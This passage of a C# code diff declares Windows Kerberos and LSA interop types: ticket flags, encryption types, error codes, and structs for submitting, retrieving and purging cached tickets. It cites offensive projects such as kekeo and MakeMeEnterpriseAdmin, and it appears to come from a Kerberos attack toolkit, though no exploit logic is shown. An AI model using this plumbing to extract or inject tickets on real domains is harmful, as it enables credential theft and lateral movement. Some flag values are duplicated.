+        public const int KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR = 11;
+        public const int KRB_KEY_USAGE_KRB_PRIV_ENCRYPTED_PART = 13;
+        public const int KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART = 14;
+
+        // Enums
+
+        [Flags]
+        public enum TicketFlags : UInt32
+        {
+            reserved = 2147483648,
+            forwardable = 0x40000000,
+            forwarded = 0x20000000,
+            proxiable = 0x10000000,
+            proxy = 0x08000000,
+            may_postdate = 0x04000000,
+            postdated = 0x02000000,
+            invalid = 0x01000000,
+            renewable = 0x00800000,
+            initial = 0x00400000,
+            pre_authent = 0x00200000,
+            hw_authent = 0x00100000,
+            ok_as_delegate = 0x00040000,
+            name_canonicalize = 0x00010000,
+            //cname_in_pa_data = 0x00040000,
+            enc_pa_rep = 0x00010000,
+            reserved1 = 0x00000001
+            // TODO: constrained delegation?
+        }
+
+        // TODO: order flipped? https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/KerberosV5Spec2.asn#L167-L190
+        [Flags]
+        public enum KdcOptions : uint
+        {
+            VALIDATE = 0x00000001,
+            RENEW = 0x00000002,
+            UNUSED29 = 0x00000004,
+            ENCTKTINSKEY = 0x00000008,
+            RENEWABLEOK = 0x00000010,
+            DISABLETRANSITEDCHECK = 0x00000020,
+            UNUSED16 = 0x0000FFC0,
+            CANONICALIZE = 0x00010000,
+            CNAMEINADDLTKT = 0x00020000,
+            OK_AS_DELEGATE = 0x00040000,
+            UNUSED12 = 0x00080000,
+            OPTHARDWAREAUTH = 0x00100000,
+            PREAUTHENT = 0x00200000,
+            INITIAL = 0x00400000,
+            RENEWABLE = 0x00800000,
+            UNUSED7 = 0x01000000,
+            POSTDATED = 0x02000000,
+            ALLOWPOSTDATE = 0x04000000,
+            PROXY = 0x08000000,
+            PROXIABLE = 0x10000000,
+            FORWARDED = 0x20000000,
+            FORWARDABLE = 0x40000000,
+            RESERVED = 0x80000000
+        }
+
+        // from https://tools.ietf.org/html/rfc3961
+        public enum KERB_ETYPE : UInt32
+        {
+            des_cbc_crc = 1,
+            des_cbc_md4 = 2,
+            des_cbc_md5 = 3,
+            des3_cbc_md5 = 5,
+            des3_cbc_sha1 = 7,
+            dsaWithSHA1_CmsOID = 9,
+            md5WithRSAEncryption_CmsOID = 10,
+            sha1WithRSAEncryption_CmsOID = 11,
+            rc2CBC_EnvOID = 12,
+            rsaEncryption_EnvOID = 13,
+            rsaES_OAEP_ENV_OID = 14,
+            des_ede3_cbc_Env_OID = 15,
+            des3_cbc_sha1_kd = 16,
+            aes128_cts_hmac_sha1 = 17,
+            aes256_cts_hmac_sha1 = 18,
+            rc4_hmac = 23,
+            rc4_hmac_exp = 24,
+            subkey_keymaterial = 65
+        }
+
+        [Flags]
+        public enum SUPPORTED_ETYPE : Int32
+        {
+            RC4_HMAC_DEFAULT = 0x0,
+            DES_CBC_CRC = 0x1,
+            DES_CBC_MD5 = 0x2,
+            RC4_HMAC = 0x4,
+            AES128_CTS_HMAC_SHA1_96 = 0x08,
+            AES256_CTS_HMAC_SHA1_96 = 0x10
+        }
+
+        public enum KADMIN_PASSWD_ERR : UInt32
+        {
+            KRB5_KPASSWD_SUCCESS = 0,
+            KRB5_KPASSWD_MALFORMED = 1,
+            KRB5_KPASSWD_HARDERROR = 2,
+            KRB5_KPASSWD_AUTHERROR = 3,
+            KRB5_KPASSWD_SOFTERROR = 4,
+            KRB5_KPASSWD_ACCESSDENIED = 5,
+            KRB5_KPASSWD_BAD_VERSION = 6,
+            KRB5_KPASSWD_INITIAL_FLAG_NEEDED = 7
+        }
+
+        public enum KERB_CHECKSUM_ALGORITHM
+        {
+            KERB_CHECKSUM_HMAC_SHA1_96_AES128 = 15,
+            KERB_CHECKSUM_HMAC_SHA1_96_AES256 = 16,
+            KERB_CHECKSUM_DES_MAC = -133,
+            KERB_CHECKSUM_HMAC_MD5 = -138,
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_CHECKSUM
+        {
+            public int Type;
+            public int Size;
+            public int Flag;
+            public IntPtr Initialize;
+            public IntPtr Sum;
+            public IntPtr Finalize;
+            public IntPtr Finish;
+            public IntPtr InitializeEx;
+            public IntPtr unk0_null;
+        }
+
+        // from https://github.com/ps4dev/freebsd-include-mirror/blob/master/krb5_asn1.h
+        public enum PADATA_TYPE : UInt32
+        {
+            NONE = 0,
+            TGS_REQ = 1,
+            AP_REQ = 1,
+            ENC_TIMESTAMP = 2,
+            PW_SALT = 3,
+            ENC_UNIX_TIME = 5,
+            SANDIA_SECUREID = 6,
+            SESAME = 7,
+            OSF_DCE = 8,
+            CYBERSAFE_SECUREID = 9,
+            AFS3_SALT = 10,
+            ETYPE_INFO = 11,
+            SAM_CHALLENGE = 12,
+            SAM_RESPONSE = 13,
+            PK_AS_REQ_19 = 14,
+            PK_AS_REP_19 = 15,
+            PK_AS_REQ_WIN = 15,
+            PK_AS_REQ = 16,
+            PK_AS_REP = 17,
+            PA_PK_OCSP_RESPONSE = 18,
+            ETYPE_INFO2 = 19,
+            USE_SPECIFIED_KVNO = 20,
+            SVR_REFERRAL_INFO = 20,
+            SAM_REDIRECT = 21,
+            GET_FROM_TYPED_DATA = 22,
+            SAM_ETYPE_INFO = 23,
+            SERVER_REFERRAL = 25,
+            TD_KRB_PRINCIPAL = 102,
+            PK_TD_TRUSTED_CERTIFIERS = 104,
+            PK_TD_CERTIFICATE_INDEX = 105,
+            TD_APP_DEFINED_ERROR = 106,
+            TD_REQ_NONCE = 107,
+            TD_REQ_SEQ = 108,
+            PA_PAC_REQUEST = 128,
+            S4U2SELF = 129,
+            PA_PAC_OPTIONS = 167,
+            PK_AS_09_BINDING = 132,
+            CLIENT_CANONICALIZED = 133
+        }
+
+        // adapted from https://github.com/skelsec/minikerberos/blob/master/minikerberos/kerberoserror.py#L18-L76
+        public enum KERBEROS_ERROR : UInt32
+        {
+            KDC_ERR_NONE = 0x0, //No error
+            KDC_ERR_NAME_EXP = 0x1, //Client's entry in KDC database has expired
+            KDC_ERR_SERVICE_EXP = 0x2, //Server's entry in KDC database has expired
+            KDC_ERR_BAD_PVNO = 0x3, //Requested Kerberos version number not supported
+            KDC_ERR_C_OLD_MAST_KVNO = 0x4, //Client's key encrypted in old master key
+            KDC_ERR_S_OLD_MAST_KVNO = 0x5, //Server's key encrypted in old master key
+            KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6, //Client not found in Kerberos database
+            KDC_ERR_S_PRINCIPAL_UNKNOWN = 0x7, //Server not found in Kerberos database
+            KDC_ERR_PRINCIPAL_NOT_UNIQUE = 0x8, //Multiple principal entries in KDC database
+            KDC_ERR_NULL_KEY = 0x9, //The client or server has a null key (master key)
+            KDC_ERR_CANNOT_POSTDATE = 0xA, // Ticket (TGT) not eligible for postdating
+            KDC_ERR_NEVER_VALID = 0xB, // Requested start time is later than end time
+            KDC_ERR_POLICY = 0xC, //Requested start time is later than end time
+            KDC_ERR_BADOPTION = 0xD, //KDC cannot accommodate requested option
+            KDC_ERR_ETYPE_NOTSUPP = 0xE, // KDC has no support for encryption type
+            KDC_ERR_SUMTYPE_NOSUPP = 0xF, // KDC has no support for checksum type
+            KDC_ERR_PADATA_TYPE_NOSUPP = 0x10, //KDC has no support for PADATA type (pre-authentication data)
+            KDC_ERR_TRTYPE_NO_SUPP = 0x11, //KDC has no support for transited type
+            KDC_ERR_CLIENT_REVOKED = 0x12, // Client’s credentials have been revoked
+            KDC_ERR_SERVICE_REVOKED = 0x13, //Credentials for server have been revoked
+            KDC_ERR_TGT_REVOKED = 0x14, //TGT has been revoked
+            KDC_ERR_CLIENT_NOTYET = 0x15, // Client not yet valid—try again later
+            KDC_ERR_SERVICE_NOTYET = 0x16, //Server not yet valid—try again later
+            KDC_ERR_KEY_EXPIRED = 0x17, // Password has expired—change password to reset
+            KDC_ERR_PREAUTH_FAILED = 0x18, //Pre-authentication information was invalid
+            KDC_ERR_PREAUTH_REQUIRED = 0x19, // Additional preauthentication required
+            KDC_ERR_SERVER_NOMATCH = 0x1A, //KDC does not know about the requested server
+            KDC_ERR_SVC_UNAVAILABLE = 0x1B, // KDC is unavailable
+            KRB_AP_ERR_BAD_INTEGRITY = 0x1F, // Integrity check on decrypted field failed
+            KRB_AP_ERR_TKT_EXPIRED = 0x20, // The ticket has expired
+            KRB_AP_ERR_TKT_NYV = 0x21, //The ticket is not yet valid
+            KRB_AP_ERR_REPEAT = 0x22, // The request is a replay
+            KRB_AP_ERR_NOT_US = 0x23, //The ticket is not for us
+            KRB_AP_ERR_BADMATCH = 0x24, //The ticket and authenticator do not match
+            KRB_AP_ERR_SKEW = 0x25, // The clock skew is too great
+            KRB_AP_ERR_BADADDR = 0x26, // Network address in network layer header doesn't match address inside ticket
+            KRB_AP_ERR_BADVERSION = 0x27, // Protocol version numbers don't match (PVNO)
+            KRB_AP_ERR_MSG_TYPE = 0x28, // Message type is unsupported
+            KRB_AP_ERR_MODIFIED = 0x29, // Message stream modified and checksum didn't match
+            KRB_AP_ERR_BADORDER = 0x2A, // Message out of order (possible tampering)
+            KRB_AP_ERR_BADKEYVER = 0x2C, // Specified version of key is not available
+            KRB_AP_ERR_NOKEY = 0x2D, // Service key not available
+            KRB_AP_ERR_MUT_FAIL = 0x2E, // Mutual authentication failed
+            KRB_AP_ERR_BADDIRECTION = 0x2F, // Incorrect message direction
+            KRB_AP_ERR_METHOD = 0x30, // Alternative authentication method required
+            KRB_AP_ERR_BADSEQ = 0x31, // Incorrect sequence number in message
+            KRB_AP_ERR_INAPP_CKSUM = 0x32, // Inappropriate type of checksum in message (checksum may be unsupported)
+            KRB_AP_PATH_NOT_ACCEPTED = 0x33, // Desired path is unreachable
+            KRB_ERR_RESPONSE_TOO_BIG = 0x34, // Too much data
+            KRB_ERR_GENERIC = 0x3C, // Generic error; the description is in the e-data field
+            KRB_ERR_FIELD_TOOLONG = 0x3D, // Field is too long for this implementation
+            KDC_ERR_CLIENT_NOT_TRUSTED = 0x3E, // The client trust failed or is not implemented
+            KDC_ERR_KDC_NOT_TRUSTED = 0x3F, // The KDC server trust failed or could not be verified
+            KDC_ERR_INVALID_SIG = 0x40, // The signature is invalid
+            KDC_ERR_KEY_TOO_WEAK = 0x41, //A higher encryption level is needed
+            KRB_AP_ERR_USER_TO_USER_REQUIRED = 0x42, // User-to-user authorization is required
+            KRB_AP_ERR_NO_TGT = 0x43, // No TGT was presented or available
+            KDC_ERR_WRONG_REALM = 0x44, //Incorrect domain or principal
+        }
+
+        [Flags]
+        public enum DSGETDCNAME_FLAGS : uint
+        {
+            DS_FORCE_REDISCOVERY = 0x00000001,
+            DS_DIRECTORY_SERVICE_REQUIRED = 0x00000010,
+            DS_DIRECTORY_SERVICE_PREFERRED = 0x00000020,
+            DS_GC_SERVER_REQUIRED = 0x00000040,
+            DS_PDC_REQUIRED = 0x00000080,
+            DS_BACKGROUND_ONLY = 0x00000100,
+            DS_IP_REQUIRED = 0x00000200,
+            DS_KDC_REQUIRED = 0x00000400,
+            DS_TIMESERV_REQUIRED = 0x00000800,
+            DS_WRITABLE_REQUIRED = 0x00001000,
+            DS_GOOD_TIMESERV_PREFERRED = 0x00002000,
+            DS_AVOID_SELF = 0x00004000,
+            DS_ONLY_LDAP_NEEDED = 0x00008000,
+            DS_IS_FLAT_NAME = 0x00010000,
+            DS_IS_DNS_NAME = 0x00020000,
+            DS_RETURN_DNS_NAME = 0x40000000,
+            DS_RETURN_FLAT_NAME = 0x80000000
+        }
+
+        public enum TOKEN_INFORMATION_CLASS
+        {
+            /// <summary>
+            /// The buffer receives a TOKEN_USER structure that contains the user account of the token.
+            /// </summary>
+            TokenUser = 1,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_GROUPS structure that contains the group accounts associated with the token.
+            /// </summary>
+            TokenGroups,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_PRIVILEGES structure that contains the privileges of the token.
+            /// </summary>
+            TokenPrivileges,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_OWNER structure that contains the default owner security identifier (SID) for newly created objects.
+            /// </summary>
+            TokenOwner,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_PRIMARY_GROUP structure that contains the default primary group SID for newly created objects.
+            /// </summary>
+            TokenPrimaryGroup,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_DEFAULT_DACL structure that contains the default DACL for newly created objects.
+            /// </summary>
+            TokenDefaultDacl,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_SOURCE structure that contains the source of the token. TOKEN_QUERY_SOURCE access is needed to retrieve this information.
+            /// </summary>
+            TokenSource,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_TYPE value that indicates whether the token is a primary or impersonation token.
+            /// </summary>
+            TokenType,
+
+            /// <summary>
+            /// The buffer receives a SECURITY_IMPERSONATION_LEVEL value that indicates the impersonation level of the token. If the access token is not an impersonation token, the function fails.
+            /// </summary>
+            TokenImpersonationLevel,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_STATISTICS structure that contains various token statistics.
+            /// </summary>
+            TokenStatistics,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_GROUPS structure that contains the list of restricting SIDs in a restricted token.
+            /// </summary>
+            TokenRestrictedSids,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that indicates the Terminal Services session identifier that is associated with the token. 
+            /// </summary>
+            TokenSessionId,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_GROUPS_AND_PRIVILEGES structure that contains the user SID, the group accounts, the restricted SIDs, and the authentication ID associated with the token.
+            /// </summary>
+            TokenGroupsAndPrivileges,
+
+            /// <summary>
+            /// Reserved.
+            /// </summary>
+            TokenSessionReference,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that is nonzero if the token includes the SANDBOX_INERT flag.
+            /// </summary>
+            TokenSandBoxInert,
+
+            /// <summary>
+            /// Reserved.
+            /// </summary>
+            TokenAuditPolicy,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_ORIGIN value. 
+            /// </summary>
+            TokenOrigin,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_ELEVATION_TYPE value that specifies the elevation level of the token.
+            /// </summary>
+            TokenElevationType,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_LINKED_TOKEN structure that contains a handle to another token that is linked to this token.
+            /// </summary>
+            TokenLinkedToken,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_ELEVATION structure that specifies whether the token is elevated.
+            /// </summary>
+            TokenElevation,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that is nonzero if the token has ever been filtered.
+            /// </summary>
+            TokenHasRestrictions,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_ACCESS_INFORMATION structure that specifies security information contained in the token.
+            /// </summary>
+            TokenAccessInformation,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that is nonzero if virtualization is allowed for the token.
+            /// </summary>
+            TokenVirtualizationAllowed,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that is nonzero if virtualization is enabled for the token.
+            /// </summary>
+            TokenVirtualizationEnabled,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level. 
+            /// </summary>
+            TokenIntegrityLevel,
+
+            /// <summary>
+            /// The buffer receives a DWORD value that is nonzero if the token has the UIAccess flag set.
+            /// </summary>
+            TokenUIAccess,
+
+            /// <summary>
+            /// The buffer receives a TOKEN_MANDATORY_POLICY structure that specifies the token's mandatory integrity policy.
+            /// </summary>
+            TokenMandatoryPolicy,
+
+            /// <summary>
+            /// The buffer receives the token's logon security identifier (SID).
+            /// </summary>
+            TokenLogonSid,
+
+            /// <summary>
+            /// The maximum value for this enumeration
+            /// </summary>
+            MaxTokenInfoClass
+        }
+
+        [Flags]
+        public enum KERB_CACHE_OPTIONS : UInt64
+        {
+            KERB_RETRIEVE_TICKET_DEFAULT = 0x0,
+            KERB_RETRIEVE_TICKET_DONT_USE_CACHE = 0x1,
+            KERB_RETRIEVE_TICKET_USE_CACHE_ONLY = 0x2,
+            KERB_RETRIEVE_TICKET_USE_CREDHANDLE = 0x4,
+            KERB_RETRIEVE_TICKET_AS_KERB_CRED = 0x8,
+            KERB_RETRIEVE_TICKET_WITH_SEC_CRED = 0x10,
+            KERB_RETRIEVE_TICKET_CACHE_TICKET = 0x20,
+            KERB_RETRIEVE_TICKET_MAX_LIFETIME = 0x40,
+        }
+
+        public enum KERB_PROTOCOL_MESSAGE_TYPE : UInt32
+        {
+            KerbDebugRequestMessage = 0,
+            KerbQueryTicketCacheMessage = 1,
+            KerbChangeMachinePasswordMessage = 2,
+            KerbVerifyPacMessage = 3,
+            KerbRetrieveTicketMessage = 4,
+            KerbUpdateAddressesMessage = 5,
+            KerbPurgeTicketCacheMessage = 6,
+            KerbChangePasswordMessage = 7,
+            KerbRetrieveEncodedTicketMessage = 8,
+            KerbDecryptDataMessage = 9,
+            KerbAddBindingCacheEntryMessage = 10,
+            KerbSetPasswordMessage = 11,
+            KerbSetPasswordExMessage = 12,
+            KerbVerifyCredentialsMessage = 13,
+            KerbQueryTicketCacheExMessage = 14,
+            KerbPurgeTicketCacheExMessage = 15,
+            KerbRefreshSmartcardCredentialsMessage = 16,
+            KerbAddExtraCredentialsMessage = 17,
+            KerbQuerySupplementalCredentialsMessage = 18,
+            KerbTransferCredentialsMessage = 19,
+            KerbQueryTicketCacheEx2Message = 20,
+            KerbSubmitTicketMessage = 21,
+            KerbAddExtraCredentialsExMessage = 22,
+            KerbQueryKdcProxyCacheMessage = 23,
+            KerbPurgeKdcProxyCacheMessage = 24,
+            KerbQueryTicketCacheEx3Message = 25,
+            KerbCleanupMachinePkinitCredsMessage = 26,
+            KerbAddBindingCacheEntryExMessage = 27,
+            KerbQueryBindingCacheMessage = 28,
+            KerbPurgeBindingCacheMessage = 29,
+            KerbQueryDomainExtendedPoliciesMessage = 30,
+            KerbQueryS4U2ProxyCacheMessage = 31
+        }
+
+        public enum LogonType : uint
+        {
+            Interactive = 2,        // logging on interactively.
+            Network,                // logging using a network.
+            Batch,                  // logon for a batch process.
+            Service,                // logon for a service account.
+            Proxy,                  // Not supported.
+            Unlock,                 // Tattempt to unlock a workstation.
+            NetworkCleartext,       // network logon with cleartext credentials
+            NewCredentials,         // caller can clone its current token and specify new credentials for outbound connections
+            RemoteInteractive,      // terminal server session that is both remote and interactive
+            CachedInteractive,      // attempt to use the cached credentials without going out across the network
+            CachedRemoteInteractive,// same as RemoteInteractive, except used internally for auditing purposes
+            CachedUnlock            // attempt to unlock a workstation
+        }
+
+        public enum LOGON_PROVIDER
+        {
+            LOGON32_PROVIDER_DEFAULT,
+            LOGON32_PROVIDER_WINNT35,
+            LOGON32_PROVIDER_WINNT40,
+            LOGON32_PROVIDER_WINNT50
+        }
+
+        // from https://github.com/alexbrainman/sspi/blob/master/syscall.go#L113-L129
+        [Flags]
+        public enum ISC_REQ : int
+        {
+            DELEGATE = 1,
+            MUTUAL_AUTH = 2,
+            REPLAY_DETECT = 4,
+            SEQUENCE_DETECT = 8,
+            CONFIDENTIALITY = 16,
+            USE_SESSION_KEY = 32,
+            PROMPT_FOR_CREDS = 64,
+            USE_SUPPLIED_CREDS = 128,
+            ALLOCATE_MEMORY = 256,
+            USE_DCE_STYLE = 512,
+            DATAGRAM = 1024,
+            CONNECTION = 2048,
+            EXTENDED_ERROR = 16384,
+            STREAM = 32768,
+            INTEGRITY = 65536,
+            MANUAL_CRED_VALIDATION = 524288,
+            HTTP = 268435456
+        }
+
+        public enum SecBufferType
+        {
+            SECBUFFER_VERSION = 0,
+            SECBUFFER_EMPTY = 0,
+            SECBUFFER_DATA = 1,
+            SECBUFFER_TOKEN = 2
+        }
+
+
+        // structs
+
+        // From Vincent LE TOUX' "MakeMeEnterpriseAdmin"
+        //  https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/master/MakeMeEnterpriseAdmin.ps1#L1773-L1794
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_ECRYPT
+        {
+            int Type0;
+            public int BlockSize;
+            int Type1;
+            public int KeySize;
+            public int Size;
+            int unk2;
+            int unk3;
+            public IntPtr AlgName;
+            public IntPtr Initialize;
+            public IntPtr Encrypt;
+            public IntPtr Decrypt;
+            public IntPtr Finish;
+            public IntPtr HashPassword;
+            IntPtr RandomKey;
+            IntPtr Control;
+            IntPtr unk0_null;
+            IntPtr unk1_null;
+            IntPtr unk2_null;
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public struct DOMAIN_CONTROLLER_INFO
+        {
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string DomainControllerName;
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string DomainControllerAddress;
+            public uint DomainControllerAddressType;
+            public Guid DomainGuid;
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string DomainName;
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string DnsForestName;
+            public uint Flags;
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string DcSiteName;
+            [MarshalAs(UnmanagedType.LPTStr)]
+            public string ClientSiteName;
+        }
+
+
+        // LSA structures
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_SUBMIT_TKT_REQUEST
+        {
+            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
+            public LUID LogonId;
+            public int Flags;
+            public KERB_CRYPTO_KEY32 Key; // key to decrypt KERB_CRED
+            public int KerbCredSize;
+            public int KerbCredOffset;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_PURGE_TKT_CACHE_REQUEST
+        {
+            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
+            public LUID LogonId;
+            LSA_STRING_IN ServerName;
+            LSA_STRING_IN RealmName;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_CRYPTO_KEY32
+        {
+            public int KeyType;
+            public int Length;
+            public int Offset;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct LSA_STRING_IN
+        {
+            public UInt16 Length;
+            public UInt16 MaximumLength;
+            public string Buffer;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct LSA_STRING_OUT
+        {
+            public UInt16 Length;
+            public UInt16 MaximumLength;
+            public IntPtr Buffer;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct LSA_STRING
+        {
+            public UInt16 Length;
+            public UInt16 MaximumLength;
+            public String Buffer;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct UNICODE_STRING : IDisposable
+        {
+            public ushort Length;
+            public ushort MaximumLength;
+            public IntPtr buffer;
+
+            public UNICODE_STRING(string s)
+            {
+                Length = (ushort)(s.Length * 2);
+                MaximumLength = (ushort)(Length + 2);
+                buffer = Marshal.StringToHGlobalUni(s);
+            }
+
+            public void Dispose()
+            {
+                Marshal.FreeHGlobal(buffer);
+                buffer = IntPtr.Zero;
+            }
+
+            public override string ToString()
+            {
+                return Marshal.PtrToStringUni(buffer);
+            }
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_RETRIEVE_TKT_RESPONSE
+        {
+            public KERB_EXTERNAL_TICKET Ticket;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_EXTERNAL_TICKET
+        {
+            public IntPtr ServiceName;
+            public IntPtr TargetName;
+            public IntPtr ClientName;
+            public LSA_STRING_OUT DomainName;
+            public LSA_STRING_OUT TargetDomainName;
+            public LSA_STRING_OUT AltTargetDomainName;
+            public KERB_CRYPTO_KEY SessionKey;
+            public UInt32 TicketFlags;
+            public UInt32 Flags;
+            public Int64 KeyExpirationTime;
+            public Int64 StartTime;
+            public Int64 EndTime;
+            public Int64 RenewUntil;
+            public Int64 TimeSkew;
+            public Int32 EncodedTicketSize;
+            public IntPtr EncodedTicket;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_CRYPTO_KEY
+        {
+            public Int32 KeyType;
+            public Int32 Length;
+            public IntPtr Value;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_RETRIEVE_TKT_REQUEST
+        {
+            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
+            public LUID LogonId;
+            public UNICODE_STRING TargetName;
+            public UInt32 TicketFlags;
+            public UInt32 CacheOptions;
+            public Int32 EncryptionType;
+            public SECURITY_HANDLE CredentialsHandle;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_QUERY_TKT_CACHE_REQUEST
+        {
+            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
+            public LUID LogonId;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_QUERY_TKT_CACHE_RESPONSE
+        {
+            public KERB_PROTOCOL_MESSAGE_TYPE MessageType;
+            public int CountOfTickets;
+            public IntPtr Tickets;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_TICKET_CACHE_INFO
+        {
+            public LSA_STRING_OUT ServerName;
+            public LSA_STRING_OUT RealmName;
+            public Int64 StartTime;
+            public Int64 EndTime;
+            public Int64 RenewTime;
+            public Int32 EncryptionType;
+            public UInt32 TicketFlags;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_TICKET_CACHE_INFO_EX
+        {
+            public LSA_STRING_OUT ClientName;
+            public LSA_STRING_OUT ClientRealm;
+            public LSA_STRING_OUT ServerName;
+            public LSA_STRING_OUT ServerRealm;
+            public Int64 StartTime;
+            public Int64 EndTime;
+            public Int64 RenewTime;
+            public Int32 EncryptionType;
+            public UInt32 TicketFlags;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_TICKET_CACHE_INFO_EX2
+        {
+            public LSA_STRING_OUT ClientName;
+            public LSA_STRING_OUT ClientRealm;
+            public LSA_STRING_OUT ServerName;
+            public LSA_STRING_OUT ServerRealm;
+            public Int64 StartTime;
+            public Int64 EndTime;
+            public Int64 RenewTime;
+            public Int32 EncryptionType;
+            public UInt32 TicketFlags;
+
+            public UInt32 SessionKeyType;
+            public UInt32 BranchId;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_TICKET_CACHE_INFO_EX3
+        {
+            public LSA_STRING_OUT ClientName;
+            public LSA_STRING_OUT ClientRealm;
+            public LSA_STRING_OUT ServerName;
+            public LSA_STRING_OUT ServerRealm;
+            public Int64 StartTime;
+            public Int64 EndTime;
+            public Int64 RenewTime;
+            public Int32 EncryptionType;
+            public UInt32 TicketFlags;
+
+            public UInt32 SessionKeyType;
+            public UInt32 BranchId;
+
+            public UInt32 CacheFlags;
+            public LSA_STRING_OUT KdcCalled;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct KERB_EXTERNAL_NAME
+        {
+            public Int16 NameType;
+            public UInt16 NameCount;
+
+            [MarshalAs(UnmanagedType.ByValArray,
+                SizeConst = 3)]
+            public LSA_STRING_OUT[] Names;
+            //public LSA_STRING_OUT[] Names;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SECURITY_LOGON_SESSION_DATA
+        {
+            public UInt32 Size;
+            public LUID LoginID;
+            public LSA_STRING_OUT Username;
+            public LSA_STRING_OUT LoginDomain;
+            public LSA_STRING_OUT AuthenticationPackage;
+            public UInt32 LogonType;
+            public UInt32 Session;
+            public IntPtr PSiD;
+            public UInt64 LoginTime;
+            public LSA_STRING_OUT LogonServer;
+            public LSA_STRING_OUT DnsDomainName;
+            public LSA_STRING_OUT Upn;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SECURITY_ATTRIBUTES
+        {
+            public int Length;
+            public IntPtr lpSecurityDescriptor;
+            public bool bInheritHandle;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct PROCESS_INFORMATION
+        {
+            public IntPtr hProcess;
+            public IntPtr hThread;
+            public int dwProcessId;
+            public int dwThreadId;
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public struct STARTUPINFO
+        {
+            public Int32 cb;
+            public string lpReserved;
+            public string lpDesktop;
+            public string lpTitle;
+            public Int32 dwX;
+            public Int32 dwY;
+            public Int32 dwXSize;
+            public Int32 dwYSize;
+            public Int32 dwXCountChars;
+            public Int32 dwYCountChars;
+            public Int32 dwFillAttribute;
+            public Int32 dwFlags;
+            public Int16 wShowWindow;
+            public Int16 cbReserved2;
+            public IntPtr lpReserved2;
+            public IntPtr hStdInput;
+            public IntPtr hStdOutput;
+            public IntPtr hStdError;
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public struct TOKEN_STATISTICS
+        {
+            public LUID TokenId;
+            public LUID AuthenticationId;
+            public long ExpirationTime;
+            public uint TokenType;
+            public uint ImpersonationLevel;
+            public uint DynamicCharged;
+            public uint DynamicAvailable;
+            public uint GroupCount;
+            public uint PrivilegeCount;
+            public LUID ModifiedId;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct TOKEN_ORIGIN
+        {
+            public LUID OriginatingLogonSession;
+        }
+
+        // the following are adapted from https://www.pinvoke.net/default.aspx/secur32.InitializeSecurityContext
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SecHandle //=PCtxtHandle
+        {
+            IntPtr dwLower; // ULONG_PTR translates to IntPtr not to uint
+            IntPtr dwUpper; // this is crucial for 64-Bit Platforms
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SecBuffer : IDisposable
+        {
+            public int cbBuffer;
+            public int BufferType;
+            public IntPtr pvBuffer;
+
+
+            public SecBuffer(int bufferSize)
+            {
+                cbBuffer = bufferSize;
+                BufferType = (int)SecBufferType.SECBUFFER_TOKEN;
